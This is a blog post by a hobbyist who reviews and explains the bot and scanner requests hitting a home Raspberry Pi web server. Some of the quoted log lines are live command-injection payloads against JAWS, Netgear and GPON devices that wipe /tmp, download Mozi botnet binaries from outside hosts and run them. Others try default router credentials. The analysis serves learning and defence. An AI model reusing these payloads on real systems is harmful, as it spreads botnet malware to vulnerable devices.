
My Own Little Server (Suspected Vulnerability-Attack Requests)

I ended up deploying a Node.js Express bulletin board on the Raspberry Pi 2 that sits switched on in a corner of my room.

Then, wanting to keep logs, I added some code to an Express middleware. I was curious who was using it, and whether anyone was coming in even though I hadn't told anyone about it.

Doesn't everyone think this once they deploy something?

I assumed I would have to sit there staring at pm2 logs or pm2 monit, and wondered whether I'd have to write something separately to save them to a log file, but after searching I found out they were already being saved somewhere.

root@ubuntu:~/.pm2/logs# cat index-error.log

root@ubuntu:~/.pm2/logs# cat index-out.log

I installed pm2 globally and didn't touch any settings; by default, two log files accumulate under ~/.pm2/logs: index-error.log and index-out.log.

What I printed with console.log goes into index-out.log, so I opened that one.

Surprisingly, people were coming in. Most of them requested the root itself; I'm not sure, but I assume they're search engine bots.

I had imagined search engine bots firing off random requests for crawling, but actually seeing it happen surprised me.

But I also noticed strange-looking requests that weren't from normal users using a regular web browser.

I thought for a moment about how they connect when I'm not even using DNS. It seems the bots that go around brute-forcing for vulnerabilities don't request combinations of the characters allowed in DNS-based URLs; there are far fewer possibilities if you just plug in IPs directly... or are there? If not, never mind; if you can refute it, you're right.

I deployed on port 80, and I think that's another reason so many came.

Anyway, out of curiosity I ended up analyzing these.

-----
Mon Feb 14 2022 17:55:20 GMT+0900 (Korean Standard Time)
::ffff:58.232.124.38
GET : /shell?cd+/tmp;rm+-rf+*;wget+net.joostjansen.ml/jaws;sh+/tmp/jaws
-----
-----
Mon Feb 14 2022 18:28:57 GMT+0900 (Korean Standard Time)
::ffff:59.94.134.9
GET : /shell?cd+/tmp;rm+-rf+*;wget+http://59.94.134.9:49481/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
-----
-----
Mon Feb 14 2022 19:49:43 GMT+0900 (Korean Standard Time)
::ffff:193.118.53.202
GET : /solr/
-----

I couldn't tell right away what it was trying to do, but it looks like it exploits some shell-related vulnerability to run the following:

After /shell,

cd /tmp;
rm -rf *;
wget http://{requester ip addr}/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws;

wipe the tmp folder,

download Mozi.a,

open up its permissions,

and run Mozi.a jaws, it seems.

But what is that Mozi.a jaws?

I don't know what the last line does, but in the end I assume it runs the Mozi.a file. Searching for jaws, it turned out to mean a Java-based web server called Java AUGUR Web Server, which is said to have a vulnerability that allows shell execution via /shell. That's why the shell command was there at the start.

I also looked up that Mozi.a file: it's the file that a botnet, built by a script that hunts for web servers with the notoriously famous bashdoor vulnerability, makes its victims download, and the name supposedly refers to Mozi, the Chinese philosopher who founded Mohism. (Honestly, I'm not sure about this.)

Also, at

Backdoor.Linux.MOZI.A

I saw a write-up where someone analyzed this file.

It says there that it does things like various DDoS attacks, collecting bot information, executing payloads from specified URLs and updating samples, and running system and user commands.

-----
Mon Feb 14 2022 20:08:08 GMT+0900 (Korean Standard Time)
::ffff:185.180.143.79
GET : /showLogin.cc
-----
-----
Mon Feb 14 2022 21:42:46 GMT+0900 (Korean Standard Time)
::ffff:193.142.146.229
POST : /GponForm/diag_Form?script/
-----
-----
Mon Feb 14 2022 21:53:02 GMT+0900 (Korean Standard Time)
::ffff:193.142.146.229
POST : /GponForm/diag_Form?script/
-----
-----
Mon Feb 14 2022 22:36:40 GMT+0900 (Korean Standard Time)
::ffff:193.142.146.229
POST : /GponForm/diag_Form?script/
-----
-----
Mon Feb 14 2022 23:21:41 GMT+0900 (Korean Standard Time)
::ffff:87.65.207.214
GET : /_profiler/phpinfo
-----

/showlogin.cc - No idea. Nothing comes up when I search for it.

/GponForm/diag_Form?script/ - Said to be a vulnerability attack related to GPON routers.

/_profiler/phpinfo - As the phpinfo at the end suggests, it looks like a request trying to access some information-related file on a PHP server.

-----
Tue Feb 15 2022 00:22:24 GMT+0900 (Korean Standard Time)
::ffff:167.94.138.118
PRI : *
-----

I noticed a request with an HTTP method called PRI, which I had never heard of or seen. A terrifying request that brings back memories of boot camp. I searched, and no such thing exists.

Looking into it, it is said to mean that an HTTP/2 request, rather than HTTP/1.1, was received, but the server wasn't configured properly to handle it.

The name PRI is scary enough, but what is it trying to do with a request like that? My hands and feet are literally trembling.

-----
Tue Feb 15 2022 03:46:00 GMT+0900 (Korean Standard Time)
::ffff:67.207.89.123
GET : /.env
-----
-----
Tue Feb 15 2022 03:46:00 GMT+0900 (Korean Standard Time)
::ffff:67.207.89.123
POST : /
-----
-----
Tue Feb 15 2022 06:09:06 GMT+0900 (Korean Standard Time)
::ffff:67.207.89.123
GET : /.env
-----

You can also see that botnets send requests to /.env.

I knew that in open source projects and when using collaboration tools, this file is kept separate for security and managed so that it is not committed to the remote repository, and that by convention (and in several Express examples) API tokens, passwords, DB accounts and connection info are written in it; apparently Docker, Symfony and Django do the same.

-----
Tue Feb 15 2022 09:50:10 GMT+0900 (Korean Standard Time)
::ffff:139.162.145.250
GET : /bag2
-----
-----
Tue Feb 15 2022 09:51:57 GMT+0900 (Korean Standard Time)
::ffff:118.76.109.41
GET : /boaform/admin/formLogin?username=adminisp&psd=adminisp
-----

/bag2 - No idea.

/boaform/admin/formLogin?username=adminisp&psd=adminisp - Searching for it, it's said to be a vulnerability attack targeting fiber-optic routers. Since it sends an ID and password as a query string to something called formLogin, it's a login attempt, and it looks like the default account's ID and password are adminisp.


I forgot about it, and then one day I opened the Raspberry Pi's log file directly. What arrived after the requests above is as follows.

I left out the types that repeated too often, requests that don't turn up in searches, and things I couldn't figure out.

-----
Tue Feb 15 2022 19:27:03 GMT+0900 (Korean Standard Time)
::ffff:173.249.53.50
POST : /boaform/admin/formLogin
-----

/boaform/admin/formLogin - Not sure, but judging from what I wrote earlier, it seems to want access to the admin account through the fiber-optic router vulnerability.

-----
Tue Feb 15 2022 21:02:30 GMT+0900 (Korean Standard Time)
::ffff:178.72.77.74
GET : /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
-----

Similar to what I wrote above, it seems to be trying to download and run a Mozi.m file.

-----
Tue Feb 15 2022 22:41:22 GMT+0900 (Korean Standard Time)
::ffff:176.107.188.252
GET : /.git/config
-----

Is this request made to find out the git repo address and, if the repo isn't private, check it and look at the source? Honestly, I don't know why they would want this.

-----
Wed Feb 16 2022 00:09:55 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:55 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /xmlrpc.php?rsd
-----
-----
Wed Feb 16 2022 00:09:56 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /blog/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:56 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /web/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:57 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wordpress/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:57 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /website/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:57 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /news/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp1/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /test/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp2/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:59 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /site/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:59 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /cms/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:59 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /sito/wp-includes/wlwmanifest.xml
-----

These are all said to be requests scanning for vulnerabilities in older WordPress versions.

-----
Wed Feb 16 2022 03:38:39 GMT+0900 (Korean Standard Time)
::ffff:47.111.227.119
GET : /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws
-----

Similar to what I wrote above, it attempts shell command execution on a particular Java web server via jaws.

-----
Wed Feb 16 2022 17:30:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmy-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2018/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:19 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2016/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:20 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:21 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:21 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:22 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin1/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:24 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/dbweb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:26 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:28 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/sqladmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:30 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2019/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2018/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:32 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/webdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2019/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:34 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:35 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmy/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:35 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:36 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.1/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:37 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin_/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:37 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:38 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:39 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/sqladmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:41 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin_/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:43 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:44 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:44 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:45 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.0-english/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:47 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:48 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/web/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:48 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:49 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:50 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:50 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:51 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/pMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:52 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:52 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:53 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/sqladmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:54 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:54 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2020/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:55 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:56 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:56 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2015/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:57 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2012/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:58 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:58 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:59 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:00 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:01 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2019/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:01 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:02 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:03 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:03 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2012/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:04 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:05 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/sqlmanager/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:05 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmy-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:06 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/webdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:07 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/web/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:07 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:08 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/sql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:09 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2014/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:10 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:10 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /shopdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:11 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:12 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /MyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:12 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /2phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:13 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:14 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:14 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:15 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/web/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:16 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2016/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:16 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2014/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:17 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/mysqlmanager/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:19 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:20 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.1-english/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:20 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:21 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:22 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin5/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:24 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /database/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:26 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /database/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/dbadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:28 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /_phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2016/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:30 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /2phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:32 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/dbadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:34 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:35 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/pma/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:36 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/sqlmanager/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:36 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2020/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:37 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-my-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:38 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:38 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:39 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/webdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:41 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.1/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:43 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:44 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:45 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2020/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:45 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:47 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4.9.7/index.php?lang=en
-----

I also got a PHP-related vulnerability scan lasting over a minute.

I have logs up to the 22nd after this, but skimming through, there was nothing particularly special.

Most were similar to the requests above, along with bots scraping the favicon, really strange requests that I couldn't even tell were attacks or not, and the post view and create requests I made myself.

Comprehensive list of attack/probe URL’s

I found this while searching; there is also a post here that compiles exploit attack URLs.

Seeing for myself that these requests really do arrive, and ending up analyzing them, was a genuinely surprising experience.


My logging middleware just crudely wrote values taken from the response object to the console.

But I learned that there are well-known libraries that typical Express-based servers use for logging.

One is a logger library called morgan, which is said to format requests and responses cleanly and show the state of the invoked router and what its result was.

There is also something called winston, which, besides printing to the console in real time like this, records logs to a dump file in JSON form.

In my case the logs were saved to a file without installing any such module, which I guess is some feature built into pm2 itself.

Next time I need to keep logs, I'll use the tools above.
